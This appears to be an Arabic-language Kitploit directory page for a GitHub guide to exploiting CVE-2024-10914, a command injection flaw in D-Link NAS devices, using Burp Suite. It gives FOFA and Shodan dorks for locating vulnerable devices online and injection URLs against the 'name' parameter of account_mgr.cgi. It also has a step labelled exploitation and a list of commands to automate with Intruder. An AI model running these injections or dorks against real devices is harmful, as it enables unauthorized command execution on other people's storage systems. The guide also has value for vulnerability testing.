Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-10914 — CVE-2024-10914_الاختبار اليدوي باستخدام burpsuite | Kitploit
أدوات/GitHubGitHub/egi08/cve-2024-10914
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقالقيادة والسيطرة
GitHubegi08/cve-2024-10914

CVE-2024-10914

CVE-2024-10914_الاختبار اليدوي باستخدام burpsuite

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

اختبار ثغرة حقن الأوامر CVE-2024-10914 في D-Link NAS_الاختبار اليدوي باستخدام burpsuite


Dork للعثور على الأجهزة المعرضة للخطر

استخدم dork البحثي التالي للعثور على أجهزة D-Link NAS التي قد تكون معرضة للخطر:

root@kitploit:~

FOFA:
app="D_Link-DNS-ShareCenter" && server=="lighttpd/1.4.25-devel-fb150ff"

SHODAN:
"http.title:D-Link" product:"lighttpd" 

تساعد سلسلة البحث هذه في تحديد الأجهزة التي تشغّل تطبيق D-Link DNS ShareCenter المعرض للخطر مع الإصدار المحدد من خادم Lighttpd المتأثر بالثغرة.


يقدم هذا الدليل إرشادات خطوة بخطوة حول كيفية الاختبار اليدوي لثغرة حقن الأوامر (CVE-2024-10914) في المعامل name لأجهزة D-Link NAS باستخدام Burp Suite. عنوان الهدف: http://Target.

المتطلبات الأساسية

  • Burp Suite
  • متصفح ويب مُهيأ لاستخدام Burp Suite كوكيل (عادةً يُضبط على 127.0.0.1:8080)

الخطوة 1: إعداد Burp Suite

  1. تشغيل Burp Suite: ابدأ تشغيل Burp Suite على جهازك.
  2. ضبط الوكيل: تأكد من أن متصفحك مُهيأ لاستخدام Burp Suite كوكيل عبر ضبط إعدادات الوكيل في المتصفح على 127.0.0.1 والمنفذ 8080.

الخطوة 2: اعتراض الطلب

  1. الانتقال إلى الهدف: في متصفحك، انتقل إلى http://Target.
  2. تفعيل الاعتراض: في Burp Suite، فعّل ميزة الاعتراض لالتقاط الطلب الصادر.

الخطوة 3: تعديل الطلب

  1. تحديد موقع المعامل المعرض للخطر: في الطلب المعترض، ابحث عن المعامل name في عنوان URL. يجب أن يظهر بالشكل التالي:

    root@kitploit:~
    /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;...;%27
    
  2. حقن أمر اختبار: عدّل المعامل name ليتضمن أمر اختبار مثل echo "test":

    root@kitploit:~
    /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;echo%20%22test%22;%27
    
  3. إرسال الطلب المعدل: أرسل الطلب المعدل إلى الخادم.


الخطوة 4: تحليل الاستجابة

  1. فحص الاستجابة: ابحث عن مخرجات الأمر المحقون في الاستجابة. على سبيل المثال، إذا نفّذ الخادم echo "test"، يجب أن ترى:

    root@kitploit:~
    test
    

الخطوة 5: استغلال الثغرة

  1. حقن أمر خبيث: إذا نجح الاختبار، جرّب أوامر أكثر تطورًا، مثل:

    root@kitploit:~
    /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;id;%27
    
  2. إرسال طلب الاستغلال: أرسل هذا الطلب إلى الخادم.

  3. تحليل الاستجابة: تحقق مما إذا كانت مخرجات الأمر (مثل معلومات معرف المستخدم) موجودة في الاستجابة.


الخطوة 6: الأتمتة باستخدام إضافات Burp Suite (اختياري)

  1. استخدام Intruder: أتمتة الاختبار باستخدام أداة Intruder الخاصة بـ Burp Suite.

    • انقر بزر الماوس الأيمن على الطلب واختر Send to Intruder.
    • عيّن المعامل name كموضع للحمولة.
    • استخدم قائمة من الأوامر كحمولات للاختبار.
  2. أمثلة على الحمولات:

    root@kitploit:~
    echo "test"
    id
    uname -a
    ls /etc
    
  3. بدء Intruder: شغّل هجوم Intruder لاختبار حمولات متعددة تلقائيًا.


تنزيل الأداة